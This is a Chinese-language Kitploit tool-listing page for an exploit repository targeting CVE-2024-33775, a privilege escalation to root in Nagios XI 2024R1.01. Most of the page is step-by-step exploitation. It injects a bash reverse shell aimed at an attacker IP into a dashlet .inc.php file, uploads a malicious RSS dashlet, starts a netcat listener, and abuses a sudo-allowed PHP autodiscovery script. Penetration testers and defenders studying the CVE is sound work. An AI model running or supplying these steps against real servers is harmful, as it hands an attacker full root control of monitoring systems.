Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2024-33775 — Nagios XI 2024R1.01 的权限提升漏洞利用程序,通过恶意 RSS dashlet 注入和 sudo 命令执行,实现从 NAGIOS 或 APACHE 用户获得完全的 root 访问权限。 | Kitploit
工具/GitHubGitHub/neo-xed/cve-2024-33775
权限提升漏洞分析漏洞利用Web应用程序漏洞利用渗透测试红队
GitHubneo-xed/cve-2024-33775

CVE-2024-33775

Nagios XI 2024R1.01 的权限提升漏洞利用程序,通过恶意 RSS dashlet 注入和 sudo 命令执行,实现从 NAGIOS 或 APACHE 用户获得完全的 root 访问权限。

查看仓库
2年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE 发现者:K. Wahab (Neo`X)

漏洞详情:

  • 产品: Nagios XI 版本 2024R1.01
  • 漏洞: 从 "NAGIOS" 或 "APACHE" 用户权限提升
  • 结果: 获得目标系统的完整 root 访问权限
  • CVE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-33775

利用方法:

本例中使用 RSS Dashlet。

1. 创建新的 Nagios XI 实例:

  • 你可以从以下地址下载 Nagios XI 版本 2024R1.01 的 OVA 文件:https://assets.nagios.com/downloads/nagiosxi/2024/ovf/nagiosxi-2024R1.0.1-64.ova

2. 权限提升:

以 NAGIOS 用户利用:

  • 在 dashlet 的 .inc.php 文件 "/usr/local/nagiosxi/html/includes/dashlets/" 中添加以下内容:

    root@kitploit:~
    exec('/bin/bash -i >& /dev/tcp/<攻击者 IP>/4441 0>&1);
    
  • 在攻击者机器上启动 Netcat 监听服务:

    root@kitploit:~
    nc -nlvp 4441
    
  • 执行以下命令以提升权限并以 root 身份接收连接:

    root@kitploit:~
    sudo /usr/bin/php /usr/local/nagiosxi/scripts/components/autodiscover_new.php --addresses=127.0.0.1/1
    

以 APACHE 用户利用:

  • 前往 "dashlets" 管理页面下载一个 Dashlet:

    root@kitploit:~
    http://TARGET_IP/nagiosxi/admin/dashlets.php?download=rss_dashlet
    
  • 修改 *.inc.php 文件:

    root@kitploit:~
    exec("sleep 30 && /bin/bash -c '/bin/bash -i >& /dev/tcp/<攻击者 IP>/4441 0>&1'");
    

    Dashlet_inc_php

  • 在攻击者机器上启动 Netcat 监听服务:

    root@kitploit:~
    nc -nlvp 4441
    
  • 在 dashlets 管理页面上传恶意 dashlet,并等待以 APACHE 用户身份接收连接。

  • 执行以下命令以提升权限并以 root 身份接收连接:

    root@kitploit:~
    sudo /usr/bin/php /usr/local/nagiosxi/scripts/components/autodiscover_new.php --addresses=127.0.0.1/1
    

(注意:执行命令后你将收到 APACHE 用户的连接,使用 CTRL+C 退出并多次重新启动监听器)

Apache_root

下载工具